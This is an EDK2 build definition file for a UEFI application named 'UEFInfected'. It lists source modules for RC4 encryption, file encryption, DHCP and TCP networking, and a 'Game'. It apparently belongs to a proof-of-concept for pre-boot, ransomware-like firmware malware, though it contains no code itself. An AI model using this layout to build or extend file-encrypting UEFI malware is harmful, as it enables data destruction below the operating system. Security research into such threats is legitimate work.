[Defines]
  INF_VERSION                    = 0x00010005
  BASE_NAME                      = UEFInfected
  FILE_GUID                      = 6987936E-ED34-44db-AE97-1FA5E4ED2116
  MODULE_TYPE                    = UEFI_APPLICATION
  VERSION_STRING                 = 1.0
  ENTRY_POINT                    = UefiMain

#
#  This flag specifies whether HII resource section is generated into PE image.
#
  UEFI_HII_RESOURCE_SECTION      = FALSE

[Sources]
  UEFInfected.c
  DHCP_BZH.c
  RC4_BZH.c
  Game.c
  EncryptFiles_BZH.c

[Packages]
  MdePkg/MdePkg.dec
  MdeModulePkg/MdeModulePkg.dec

[LibraryClasses]
  UefiApplicationEntryPoint
  UefiLib
  PcdLib


[Protocols]
  gEfiBlockIoProtocolGuid
  gEfiRngProtocolGuid
  gEfiCpuArchProtocolGuid
  gEfiTcp4ServiceBindingProtocolGuid
  gEfiTcp4ProtocolGuid
  gEfiDhcp4ServiceBindingProtocolGuid
  gEfiDhcp4ProtocolGuid

[Depex]
  TRUE

[Guids]
  gEfiFileInfoGuid